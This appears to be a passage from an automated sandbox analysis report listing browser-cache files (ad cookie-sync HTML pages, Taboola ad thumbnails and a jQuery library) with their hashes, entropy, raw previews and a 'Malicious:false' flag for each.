                                                                                                                                                                                                    Size (bytes):20808
                                                                                                                                                                                                    Entropy (8bit):5.301767642140402
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                    MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                                                                                                                                    SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                                                                                                                                    SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                                                                                                                                    SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[2].htm
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20808
                                                                                                                                                                                                    Entropy (8bit):5.301767642140402
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                    MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                                                                                                                                    SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                                                                                                                                    SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                                                                                                                                    SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[3].htm
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20808
                                                                                                                                                                                                    Entropy (8bit):5.301767642140402
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                    MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                                                                                                                                    SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                                                                                                                                    SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                                                                                                                                    SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\checksync[4].htm
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20808
                                                                                                                                                                                                    Entropy (8bit):5.301767642140402
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                                                                                                                                    MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                                                                                                                                    SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                                                                                                                                    SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                                                                                                                                    SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_199655af051ff7c0f5750635e94a1c08[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):43979
                                                                                                                                                                                                    Entropy (8bit):7.983726195586281
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:aEn6uZxzdJ0+kexGOh1UJCKV6tgif40Ge2vlJ0pEMV+ALqNU0LmWunrzL+ay+ONJ:N6u9pkexGLJCKk1f40mvz0h+AuG0LnuA
                                                                                                                                                                                                    MD5:AB6CAD136C683AFFDD2E13F6FF9D8064
                                                                                                                                                                                                    SHA1:C64BC83FD3154EE63845D9F882C8C44C9B7F8D30
                                                                                                                                                                                                    SHA-256:DFD4CCBBA01062D701E1B75DC0AB53FE0198123617B4E377DDF9101FE7C0C9FF
                                                                                                                                                                                                    SHA-512:528D62FD14D4F062E2D54D7053992C22DCD53B27583E0038D567984F270E970C383B77FDCC39C948F5D0B3EE05447366162200E1CCA0302364AA273376DB374E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F199655af051ff7c0f5750635e94a1c08.jpeg
                                                                                                                                                                                                    Preview: ......JFIF.....................................................................&""&0-0>>T.............................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...............6..................................................................7.}.8U._.^s.3`k....Z..M..%R....9..mM..gr...r0....n..a.U.....~...e.K.Z..S.OC....e...TU....[...E...].S.2L..r.i..s!......V....F.p>.3?bz..3.1.f.'..r..`/]1O.c.4{`j..A...x.y..0A.g.\....g...W8......E..6.jh.Y]E.R..-R..[$....$.J.!Rg.t0C?....O./.>...z......dl,b>'........Gt....B....h..J<;\J.;0..}.%;.w......OW.5..~y>..Z...4H}.{.k....F..f..?@...A..\.T..Ao.BY...}o..E.]....o..=s..C~..K...]y..Fs1...V.^`...Zg3.A.].p...k.{...M.AJ.:.h&..=.D..OP[(^V..Re.?...5............(.`..vi&r...._3T.C 5..#..3...{,42..{N....@....c..%..]....f*..Y(.....=... ......9}..Qf.Z)u~.K..........)rj..o.\<z. iS!LWS3.f.Q.CP[2*.*.-6..Q.5.%....(..;.q.R..r....]..w..b..<E.K....j".P.M..Q'.}0....7Tlh......r.....+.1.xr.|..5w.......q.u.R...4.u..l.....C....~v..}....<.#.X
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_5c49d96e95caf0260d3f4c61945806e3[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):18556
                                                                                                                                                                                                    Entropy (8bit):7.790357028893508
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:GOsXaYNg7Bq84iuc5QsYtxbvDSL0kuYUbdNqLUyb6s:nYylq84Jc5Q/9uL0JHqwyms
                                                                                                                                                                                                    MD5:CCC6D094C2738F6C42ADA3712FD33F93
                                                                                                                                                                                                    SHA1:22D391E417E8000F3DBD05F1A095C9D6EABFAB4B
                                                                                                                                                                                                    SHA-256:0BA81DFD3E2119A8442AA42F611BE0D59238A4CCA49C2D7F06803AD81D44C005
                                                                                                                                                                                                    SHA-512:9225C8AFB1609B2D66D63848895B5376AA44865893EA1BE339623A8ADED5F270756E1916EF9524AB1B794F84AF19C751FE6754D8131438A8EB0D2AF2B42B90C7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_556%2Cy_316/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c49d96e95caf0260d3f4c61945806e3.jpg
                                                                                                                                                                                                    Preview: ......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ ...........1acspAPPL....APPL...........................-appl................................................desc...\...bdscm........cprt...D...#wtpt...h....rXYZ...|....gXYZ........bXYZ........rTRC........aarg....... vcgt.......0ndin.......>chad...T...,mmod.......(vcgp.......8bTRC........gTRC........aabg....... aagg....... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ.......0daDK.......FnlNL.......bfiFI.......xitIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK......."zhCN........ruRU...$...8enGB.......\frFR.......pms..........hiIN........thTH........caES........enAU.......\esXL........deDE........enUS........ptBR........plPL........elGR..."....svSE.......<trTR.......LptPT.......`jaJP.......v.L.C.D. .u. .b.o.j.i.... .L.C.D.F.a.r.g.e
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_679ad616136b16daf68b19be42b62408[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):8738
                                                                                                                                                                                                    Entropy (8bit):7.9389176399864505
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:/8OCIcmA/kV8lmvCwH0UpzdYChd52HevPsiGrf3QlUeocHd:/8OJcDkVfvCOzdlb2HW88UeZ
                                                                                                                                                                                                    MD5:7F51A55E5E783AE24E03D34880C43CBD
                                                                                                                                                                                                    SHA1:F537B439DD49225E5650F58DA6B9074A5EBDDA40
                                                                                                                                                                                                    SHA-256:77BBFA1D4DA459FFE4F232DACA53F2AD0768E32E7C3ADB7FC6F934C4CF5B24A1
                                                                                                                                                                                                    SHA-512:EA770F834C2AA37CBCC3589C6B3844ED1C0B589B96303593C42F513B210BFC45333633CD9094B22CAD1580C9D9352A08D229E0D8746966AD57A363471B7F5800
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F679ad616136b16daf68b19be42b62408.jpg
                                                                                                                                                                                                    Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......7...."..........4.....................................................................}..qJma.3I....3.....GC..f.`n...R...p=..~Y.........d.-#)L.2%!h..qp.+.l.j...r.=.Wr..=..8.......Zk.......{GC.....&.........,.pq]......m9."Z&......j..q..U..J.L^...C..;....-.......g..j.L...y..._.7t...l..l.V...UdM. .3..y".....xw 0.BP...m.]Us..t4i..h.4.C.)Jl3{.....q.TL...2k}.^..l.iG.,m+,E....}=..?w.K...Lb.y%..5.a....Q.!d.>T.c.n,.[.[._j.v.X..^.....ZS...dq....u..JAKz.20.j.....O..d].@.Q.[W...b..+.v...m.....U.0.CA.j.'EJ.6..*n...|.....`h....."+.........K......"...N...[JJu.h.....W...lYw}Q..[..<...':.?F1..0.l..}.....t.(.-.,HVQ...[.}...^..5..{o......M.VWp.,b....)..shu.f.r.\..........f.1.VBN$q.1..J..9U:......VX.4..SY.|'.q....D.O...s...^,........VC.b...Rg......l....dwjX.&k..a.1.._..%..|d.z..U.....Ls...}..<..b<kP...TaS...c..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_7b93833687ad80546a194e7eed06c1eb[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):19024
                                                                                                                                                                                                    Entropy (8bit):7.972650385969428
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:/eynayUOtR03+Vnx4zh7YaUtrTMlLFQXs8WEskQCORLjjhc:/eENss0YJU8WzCOte
                                                                                                                                                                                                    MD5:BB06E9EBDD03FD293BDF280D07FE360B
                                                                                                                                                                                                    SHA1:456F0FA99508077FBCF0A64DB8F75668C0092418
                                                                                                                                                                                                    SHA-256:77A9011B083F5379596C19855F18A5DFF7A93B33D2CB62E460670B5204BCEBD9
                                                                                                                                                                                                    SHA-512:6EE169BCC67DB4658ED199267E3830BDB3095E63309B2DCE182E4C307FB791835949827794642BB073FDC94B40DACAC5637DF5BD1D5AEED012015DCD8E621F24
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F7b93833687ad80546a194e7eed06c1eb.jpg
                                                                                                                                                                                                    Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}................7...............3...............................................................E....5...*P.l.v3....>.@.K.n..i......:....;s.......:...55...)2.hD.....C{4..B.vj.F].=.....P...6lv.u.k..F5.iji...i.z}....k.SSr.L.Y..4.:y>.1v<..1.~.f..=...h...j.Y.i..X..Z}.C......4....i...0.w..V.3..=S.....sU..Z,s'..S)Q!...'.F..E..t.....#2n../..!..w.o..<'....0.>GC.....8...3S....u.Y#I.:.o.["..g.T|.'.D........N..?..v..e.......(....ET...<Da........0.8..........^...;...x...-!*W9...v).PT...&..8N....p..q...'kEE4..c20N.k....-3.....:.$..z.[z..!.p..".v...-qo....Uf..w.A... .}..0Ef.4.:.*."..#"...0..=3...w...Q....T1..L.q)r@C7.su.q.!... )..1..G....u...j/...5....B....]@Y8..j8.c..~#....f.......#..|U....|+.d.\y.Y..J.>kG.Y........i.D3^.C.5.B5I.......K(....+..6].5..3.m.w.b.}..H...8.v.LpS..Mu.RaE.q.m.}.msg....9PM.Q.Q6..E4W..-J.....l0J.CF.*.......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_831afd7b16ef15301070d350663f9c7a[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):17922
                                                                                                                                                                                                    Entropy (8bit):7.859255856375248
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:OkVCDMrzQUIa36EPUOgrSdPRD2kPJLx25XDenIqTN:OkVCYrzWEPUOgr4h2khLx2XCnXTN
                                                                                                                                                                                                    MD5:CBA5C805BEE81A5DA114F7646613F3FC
                                                                                                                                                                                                    SHA1:587CD288207C2C1F62E43663AD4AC0EAFFF9F87A
                                                                                                                                                                                                    SHA-256:A4A7FD3DA82AD14ED5320348B475C6DF8A3838122CFA1C453FE5D314C32811E9
                                                                                                                                                                                                    SHA-512:1A0F52890E0F0460B460C926A0339B96EB51382475E583759F5DDE694ACF2A57148E8E5F12ED9D0332D45C8FF78E7B27631C4F787EE74A8B715084D09E96101C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F831afd7b16ef15301070d350663f9c7a.jpg
                                                                                                                                                                                                    Preview: ......JFIF.............TICC_PROFILE......DUCCM.@..mntrRGB XYZ ............acspMSFT....CANOZ009.......................-CANO................................................rTRC...,....gTRC...,....bTRC...,....rXYZ...8....gXYZ...L....bXYZ...`....chad...t...,cprt.......@dmnd.......|dmdd...\....wtpt........tech........desc...\....ucmI.......4curv.......................".'.,.1.6.;.@.E.J.O.T.Y.^.c.h.m.r.v.{...............................................................$.+.1.7.>.D.K.R.Y._.f.m.u.|.........................................&./.8.A.J.S.].f.p.z...............................!.,.7.C.N.Z.f.q.}......................... .-.:.G.U.b.p.~.......................*.9.H.X.g.v.....................&.7.H.X.i.z...................*.<.O.a.s...................2.E.Y.m.................$.9.N.d.y...............'.=.S.j...............!.9.P.h...............*.B.[.t.............&.@.Z.t...............I.d.............%.A.].y...........&.C.`.}...........0.N.m...........%.D.d...........".B.c...........'.H.i........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\http___cdn.taboola.com_libtrc_static_thumbnails_e422867e373581902d24ef95be7d4e1b[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):7445
                                                                                                                                                                                                    Entropy (8bit):7.93831956568165
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:6Lj959JigoMQOL8q6TkMlYo6UsZlwtrGDWTInXeGcCS:6Lj/9Jdk+Ml76h2Kk
                                                                                                                                                                                                    MD5:C4B9684545B9781F5F19A99ECD6A95B5
                                                                                                                                                                                                    SHA1:C25C9E466C46184BE03D654BF13DED7D55E71C1B
                                                                                                                                                                                                    SHA-256:845E13CB4404F674F57C712D570BC9E353A2CB742722DA9116F272B9226C71F7
                                                                                                                                                                                                    SHA-512:1E0B379E40FB2099462BC75C653217469071D59408F9030E4255E65765140C7762F2332CE3FD78E18337EBCB0A95E729AB2C71A79B2761DE8C8700FA6455172E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fe422867e373581902d24ef95be7d4e1b.jpg
                                                                                                                                                                                                    Preview: ......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4.................................................................(..{P....>.#.....M..N+EF..*.=U.W.'.).0..(.ipG..u.K..JP..C.....[.%.p......My<$q..LI!......k..B .j$6..J...$V<.)rY.).....KK r&.&.+...I..@4..".-.h5s..X.9gJ...D..[........`./.rsn..'C.r|b..2^.m.V{.B.&./H....%..&..p>m.X.O..._`..'~.b/H....{.0.qcS.P.....R.]x.......zW.h.+.~.T..@..o..;.+..F....J.4.p......>..Q.U...L.p...v...&.e.D..R5*P.y.4K}.m.X.HK.. ..y.h.3eiP...h.[..u.,..B.1..c..$.(.*5Fn..5...j.;..I..k.j.......q....J.G.......g...H.J3b.I..@LJd.....g.9x<AgB._W..b.d.K..}.0..;^.hw.r...".....}..?...,......~.9..]....t...`"._P.D>M.[o.@...:.....n..]..Z...%?N...i?u../"..&.V.W0u..=.v.H.. ......6...7.?b.e}...!.......@..b.....G.t.......9...r...6..[..)......l[..m.}...Y)7.-.3..p.;......+..T*..S...5V..e....SE.V..M&..{.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):19305
                                                                                                                                                                                                    Entropy (8bit):7.967008425870337
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:aYxPiSRWO/FDL2coduthmS3d/3dcxP6dP4/aZrogHt:aZ4nFL2coEthmSN/3dct6b
                                                                                                                                                                                                    MD5:30939BEFE688393E77D9FB1A40332FD2
                                                                                                                                                                                                    SHA1:3BCDE0BBB03ECE8F53A29583880E1EA598563969
                                                                                                                                                                                                    SHA-256:0A74990CF6E3033D3280EFF2A5506AB940B1DF6F48AF49011164129D5B7EEEE0
                                                                                                                                                                                                    SHA-512:74966474BB18F8B0F4808B66985F9FF1EB560AAEC83D3255797EB3D5A85E4ED09994E15B0D6FE4A83CC3F64E2C3F0305DEA296D9B5924536EB1A2619571186DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1813_1200x800_1000x600_dc50ae7dd7f119b94c09edb195c1bb8e.png
                                                                                                                                                                                                    Preview: ......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...."..........6....................................................................z.......&jg*vd..VC...p..E..Y..zb..p....w 3..1k..t.Q.5.^\M9..q.Vl..'.b8e.{Q........Hy..:.%KB\.,?...g.`.}.&v..JnJ..]VL..q..^........[*.=..xu,.....jp..P...:`Lk..."..I...R.......b.Xzi........N.wUR....w..<......"..d.#W..LJ...".C.....ZH.j.u.:h....K..q.Oq.^Pj...){x.o.i...^.%..\.;..?..Gcy.=M....q.....e..e,)./.@.$....}.4W......z...!].y.d6.Y......v!P.......i.0..f.\.J..,@W...%Zl.q&.J...o.Qgx..^....Z.|.G......Z*.P&f....v...d."...l...2T.Z<.}....W..5..I#C)FMS...G.......G.....;.Xm2....Y.B:.......O...y.!...$dt......M...3d...r....?fIN....Y...F./2...DK.N..4oJ'b...,...Z....[i....zt....S...... 2.w.-..dJ.|.k..zV..U....<bc(..T3..v..n.}...UItK.n..w..u.......Z.d...<...G.t6......v8..$G.......rL.~.....ui.\.....gk....Ek>mS.%...A
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\jquery-2.1.1.min[1].js
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):84249
                                                                                                                                                                                                    Entropy (8bit):5.369991369254365
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                    MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                    SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                    SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
